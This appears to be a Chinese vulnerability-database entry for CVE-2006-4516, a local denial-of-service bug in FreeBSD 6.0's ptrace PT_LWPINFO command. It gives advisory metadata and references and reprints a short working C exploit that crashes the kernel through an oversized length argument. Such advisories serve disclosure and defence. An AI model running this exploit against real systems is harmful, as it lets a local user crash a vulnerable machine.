FreeBSD PTrace PT_LWPINFOptrace命令本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111257 漏洞类型 边界条件错误
发布时间 2006-10-12 更新时间 2006-10-13
CVE编号 CVE-2006-4516 CNNVD-ID CNNVD-200610-183
漏洞平台 BSD CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/2524
https://www.securityfocus.com/bid/20440
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-183
|漏洞详情
FreeBSD6.0-RELEASE中存在整数符号类型错误,本地用户可以通过带有一个较大负值的PT_LWPINFOptrace命令引起拒绝服务(内存损坏和内核紧张)攻击,该负值可以满足带有符号的最大值的检查,但是会在无符号的copyout函数调用中使用。
|漏洞EXP
#include <sys/types.h>
#include <sys/ptrace.h>
#include <unistd.h>
/* lol lol, exploit for http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419
thank you oh unknown, sincerely kokanin@gmail. usage: ./blah <pid you own> */

int main(int argc, char *argv[]){
	struct ptrace_lwpinfo *lol;
	ptrace(PT_ATTACH,atoi(argv[1]),NULL,0);
	wait(NULL);
	ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768);
}

// milw0rm.com [2006-10-12]
|受影响的产品
FreeBSD FreeBSD 6.0 -RELEASE
|参考资料

来源:IDEFENSE
名称:20061010FreeBSDptracePT_LWPINFODenialofServiceVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419
来源:XF
名称:freebsd-ptlwpinfo-ptrace-dos(29476)
链接:http://xforce.iss.net/xforce/xfdb/29476
来源:BID
名称:20440
链接:http://www.securityfocus.com/bid/20440
来源:SECUNIA
名称:22367
链接:http://secunia.com/advisories/22367